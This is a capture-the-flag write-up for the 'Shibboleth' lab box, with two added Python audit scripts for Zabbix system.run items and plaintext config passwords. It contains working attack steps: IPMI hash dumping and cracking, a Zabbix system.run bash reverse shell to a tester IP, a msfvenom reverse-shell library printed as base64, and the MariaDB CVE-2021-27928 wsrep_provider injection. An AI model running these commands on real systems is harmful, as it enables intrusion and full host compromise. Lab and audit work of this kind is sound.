Enumeration

Starting Nmap 7.92 ( <https://nmap.org> ) at 2021-11-18 12:15 EET
Nmap scan report for 10.10.11.124
Host is up (0.24s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to <http://shibboleth.htb/>
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: shibboleth.htb

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 17.12 seconds

We can add the shibboleth.htb domain to the /etc/hosts file and then browse to http://shibboleth.htb/. The site looks like an unmodified template, so we will run a directory search with gobuster.

gobuster -w /usr/share/dirbuster/directory-list-2.3-medium.txt dir --url <http://shibboleth.htb>

Directory listing is enabled in some directories, such as /assets and /contact, but there is nothing important there.

We can also enumerate subdomains with gobuster's vhost mode.

gobuster vhost --url shibboleth.htb --wordlist /usr/share/dirbuster/directory-list-2.3-medium.txt | grep 'Status: 200'
Found: monitor.shibboleth.htb (Status: 200) [Size: 3686]
Found: monitoring.shibboleth.htb (Status: 200) [Size: 3686]
Found: Monitoring.shibboleth.htb (Status: 200) [Size: 3686]
Found: Monitor.shibboleth.htb (Status: 200) [Size: 3686]
Found: zabbix.shibboleth.htb (Status: 200) [Size: 3686]

The monitor and monitoring subdomains (and their capitalised variants) seem to point to the same service.

A UDP scan also shows some results:

Starting Nmap 7.92 ( <https://nmap.org> ) at 2021-11-18 15:37 EET
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.072s latency).
Not shown: 99 closed tcp ports (reset), 89 closed udp ports (port-unreach)
PORT      STATE         SERVICE         VERSION
80/tcp    open          tcpwrapped
|_http-title: FlexStart Bootstrap Template - Index
53/udp    open|filtered domain
138/udp   open|filtered netbios-dgm
623/udp   open          asf-rmcp?
1718/udp  open|filtered h225gatedisc
5060/udp  open|filtered sip
10000/udp open|filtered ndmp
20031/udp open|filtered bakbonenetvault
30718/udp open|filtered unknown
32768/udp open|filtered omad
49154/udp open|filtered unknown
49182/udp open|filtered unknown

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 378.48 seconds

Getting the foothold

Port 623 is IPMI, the protocol used by BMCs (baseboard management controllers) to monitor and manage servers out of band. To enumerate it further, we can use Metasploit:

msfconsole
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS shibboleth.htb
run

This gives us some information about the service and about how users are authenticated. It is running IPMI 2.0, a version with known weaknesses.

[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We are going to try the possible vulnerabilities of this version. I tried Bypass via Cipher 0 with no result, but Remote Password Hash Retrieval seems to work:

use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS shibboleth.htb
run

We get an administrator hash.

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:babfa27082050000d2c733c4d424975196bdc19a64a62f5bc2ab8ba11db018c20794ffa4f67c85aaa123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e886824eced6b6f27199194b7dce7d2779fcd8b8
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can set the OUTPUT_HASHCAT_FILE option to write the hash in hashcat format so we can try cracking it.

set OUTPUT_HASHCAT_FILE hash.txt

If we run hashcat as usual:

hashcat hash.txt /usr/share/dict/rockyou.txt

we will get the password ilovepumpkinpie1 for Administrator.

We can use those credentials to log into zabbix.shibboleth.htb. We can confirm the Zabbix version is 5.0.17.

Getting the user flag

I tried accessing the scripts page: http://zabbix.shibboleth.htb/zabbix.php?action=script.list with no success as it appears we don't have administrator rights.

Under Configuration > Hosts > Items, item keys such as system.cpu.util[,softirq] are listed. Since we can edit items, we may be able to add one with a system.run key, which makes the agent execute a command.

system.run["bash -c 'bash -i >& /dev/tcp/10.10.14.100/6666 0>&1'"]
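Any Zabbix user who can edit items on a host can push a system.run key to that host's agent, which is exactly what the step above relies on, so from the defender's side the useful check is to find every such item in the configuration. The following script is an added example and is not part of the original writeup: it parses Zabbix item keys (a name followed by an optional bracketed parameter list, honouring quoted and nested parameters) and reports every system.run item together with the command and its wait/nowait mode. The sample records are constructed in the shape of the Zabbix API's item.get output; itemid and key_ are real field names, the host field is an assumption added for readability.

```python
import re

# A key name is letters, digits, '_', '-' and '.', e.g. system.cpu.util or vfs.fs.size
KEY_NAME_RE = re.compile(r"^[0-9a-zA-Z_.-]+")


def _parse_params(s, pos):
    """Parse a comma-separated parameter list; s[pos-1] is the opening '['.
    Returns (params, index just after the matching ']')."""
    params = []
    while True:
        if pos < len(s) and s[pos] == '"':
            # Quoted parameter: runs to the next unescaped double quote, may contain ',' and ']'
            pos += 1
            buf = []
            while pos < len(s) and s[pos] != '"':
                if s[pos] == "\\" and pos + 1 < len(s) and s[pos + 1] == '"':
                    buf.append('"')
                    pos += 2
                else:
                    buf.append(s[pos])
                    pos += 1
            if pos >= len(s):
                raise ValueError("unterminated quoted parameter")
            pos += 1  # skip the closing quote
            params.append("".join(buf))
        elif pos < len(s) and s[pos] == "[":
            # Nested array parameter
            sub, pos = _parse_params(s, pos + 1)
            params.append(sub)
        else:
            # Unquoted parameter: everything up to the next ',' or ']' (may be empty)
            start = pos
            while pos < len(s) and s[pos] not in ",]":
                pos += 1
            params.append(s[start:pos])
        if pos >= len(s):
            raise ValueError("unterminated parameter list")
        if s[pos] == ",":
            pos += 1
            continue
        if s[pos] == "]":
            return params, pos + 1
        raise ValueError(f"unexpected character {s[pos]!r} at offset {pos}")


def parse_item_key(key):
    """Split a Zabbix item key into (name, [params]); raises ValueError on malformed keys."""
    m = KEY_NAME_RE.match(key)
    if not m:
        raise ValueError(f"bad key name in {key!r}")
    name, rest = m.group(0), key[m.end():]
    if rest == "":
        return name, []
    if not rest.startswith("["):
        raise ValueError(f"junk after key name in {key!r}")
    params, end = _parse_params(rest, 1)
    if end != len(rest):
        raise ValueError(f"trailing data after ']' in {key!r}")
    return name, params


def audit_items(items):
    """Return one finding per system.run item (or per key the parser rejects)."""
    findings = []
    for it in items:
        try:
            name, params = parse_item_key(it["key_"])
        except ValueError as exc:
            findings.append({"itemid": it["itemid"], "host": it.get("host"), "issue": f"unparseable key: {exc}"})
            continue
        if name == "system.run":
            command = params[0] if params else ""
            mode = params[1] if len(params) > 1 and params[1] else "wait"
            findings.append({"itemid": it["itemid"], "host": it.get("host"),
                             "issue": "remote command item", "command": command, "mode": mode})
    return findings


# Constructed sample in the shape of item.get output (not real data from the box)
SAMPLE_ITEMS = [
    {"itemid": "28101", "host": "shibboleth.htb", "key_": "system.cpu.util[,softirq]"},
    {"itemid": "28102", "host": "shibboleth.htb", "key_": "vfs.fs.size[/,free]"},
    {"itemid": "28103", "host": "shibboleth.htb", "key_": 'system.run["whoami"]'},
    {"itemid": "28104", "host": "shibboleth.htb", "key_": 'system.run["/bin/sh -c \'id > /tmp/out\'",nowait]'},
    {"itemid": "28105", "host": "shibboleth.htb", "key_": "net.tcp.listen[3306"},
]

if __name__ == "__main__":
    for finding in audit_items(SAMPLE_ITEMS):
        print(finding)
```

Run against a real export, the findings are the items to review with the host owners; on the agent side, a Zabbix 5.0 agent can refuse such keys outright with DenyKey=system.run[*] in zabbix_agentd.conf, which closes this path regardless of who can edit items in the frontend.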

I will listen for the connection with pwncat:

pwncat -lv 6666

And we are in! We can now see which users have a home directory. We probably have to escalate to ipmi-svc.

zabbix@shibboleth:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root     root     4096 Oct 16 12:24 .
drwxr-xr-x 19 root     root     4096 Oct 16 16:41 ..
drwxr-xr-x  3 ipmi-svc ipmi-svc 4096 Oct 16 12:23 ipmi-svc

Zabbix probably uses a database, so let's see which ports are listening:

zabbix@shibboleth:/$ netstat -tulpn | grep LISTEN

netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:10050           0.0.0.0:*               LISTEN      1139/zabbix_agentd
tcp        0      0 0.0.0.0:10051           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::10050                :::*                    LISTEN      1139/zabbix_agentd
tcp6       0      0 :::10051                :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -

It seems there is a MySQL (MariaDB) instance on 3306, the default port. We cannot log into it with the password we got before.

But we can access the user with that password (I feel stupid 🙂).

zabbix@shibboleth:/$ su ipmi-svc
Password: ilovepumpkinpie1

Privilege escalation

We will try to find the configuration files for Zabbix.

ipmi-svc@shibboleth:~$ find / -name '*zabbix*' 2>/dev/null

They are in /etc/zabbix. Let's grep for passwords:

ipmi-svc@shibboleth:/etc/zabbix$ grep -iR password

We find the following lines. One of them contains a plaintext password for the database.

zabbix_server.conf.dpkg-dist:### Option: DBPassword
zabbix_server.conf.dpkg-dist:#  Database password.
zabbix_server.conf.dpkg-dist:#  Comment this line if no password is used.
zabbix_server.conf.dpkg-dist:# DBPassword=
zabbix_server.conf:### Option: DBPassword
zabbix_server.conf:#    Database password.
zabbix_server.conf:#    Comment this line if no password is used.
zabbix_server.conf:DBPassword=bloooarskybluh
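The finding above is a secret stored in a configuration file that an unrelated, unprivileged account (ipmi-svc) can read. A defender can look for exactly that condition on a schedule. The script below is an added example, not part of the original writeup: it walks a directory tree, reports every file with a non-empty `...Password=` option that is not commented out, and records whether the file is group- or world-readable. The directory it scans is a throwaway tree constructed inline to mimic /etc/zabbix, with a placeholder password rather than the one from the box; the file modes in it are assumptions.

```python
import os
import re
import stat
import tempfile

# An uncommented option whose name ends in "Password" with a non-empty value,
# e.g. "DBPassword=secret". Lines starting with '#' never match.
CRED_RE = re.compile(r"^\s*([A-Za-z_]*Password)\s*=\s*(\S+)")


def credential_options(text):
    """Return the option names of every credential-bearing line in a config file."""
    return [m.group(1) for line in text.splitlines() for m in [CRED_RE.match(line)] if m]


def scan_tree(root):
    """Report every file under root that stores a credential, with its permission bits."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, errors="replace") as fh:
                    options = credential_options(fh.read())
            except OSError:
                continue  # unreadable to the auditing account: not our problem here
            if not options:
                continue
            st = os.stat(path)
            findings.append({
                "path": os.path.relpath(path, root),
                "options": options,
                "mode": stat.filemode(st.st_mode),
                "group_readable": bool(st.st_mode & stat.S_IRGRP),
                "world_readable": bool(st.st_mode & stat.S_IROTH),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree():
    """Construct a temporary directory resembling /etc/zabbix (constructed data, assumed modes)."""
    root = tempfile.mkdtemp(prefix="zabbix-audit-")
    # Packaging leftover: the DBPassword line is commented out, so it holds no secret
    with open(os.path.join(root, "zabbix_server.conf.dpkg-dist"), "w") as fh:
        fh.write("### Option: DBPassword\n#\tDatabase password.\n# DBPassword=\n")
    # Live server config with a real (here: placeholder) password, world-readable
    live = os.path.join(root, "zabbix_server.conf")
    with open(live, "w") as fh:
        fh.write("### Option: DBPassword\nDBPassword=CONSTRUCTED_PLACEHOLDER\n")
    os.chmod(live, 0o644)
    # Agent config with no password option at all
    agent = os.path.join(root, "zabbix_agentd.conf")
    with open(agent, "w") as fh:
        fh.write("Server=127.0.0.1\nServerActive=127.0.0.1\n")
    os.chmod(agent, 0o640)
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        print(finding)
```

Only zabbix_server.conf is reported, as mode -rw-r--r--: the fix on a real host is to make such files readable only by root and the service's group (for example mode 640 owned by root:zabbix), so that a foothold in another local account no longer yields the database credential.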

We can try the obtained password and it works!

ipmi-svc@shibboleth:/etc/zabbix$ mysql --user=zabbix --password=bloooarskybluh
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 918
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>

That MariaDB version (10.3.25) is vulnerable to CVE-2021-27928. We can perform the exploit by following the steps in this repository's README:

GitHub - Al1ex/CVE-2021-27928: CVE-2021-27928 MariaDB/MySQL 'wsrep provider' command injection vulnerability
Generate the exploit:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.167 LPORT=6667 -f elf-so -o CVE-2021-27928.so

Encode it as base64 and copy it:

cat CVE-2021-27928.so | base64

Then set up the listener (whatever you want, I used netcat).

Then, decode it in the target machine:

echo -e "f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3AEAAAAAAAAmAgAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAailYmWoCX2oBXg8FSJdIuQIAGgsKCg6nUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlI
uy9iaW4vc2gAU0iJ51JXSInmDwU=" | base64 -d >/tmp/exploit.so

Connect again to the MariaDB instance and set wsrep_provider to the decoded library. You will get a lost-connection error as soon as the reverse shell is established.

MariaDB [(none)]> SET GLOBAL wsrep_provider="/tmp/exploit.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query

And now we can simply grab the root flag!

References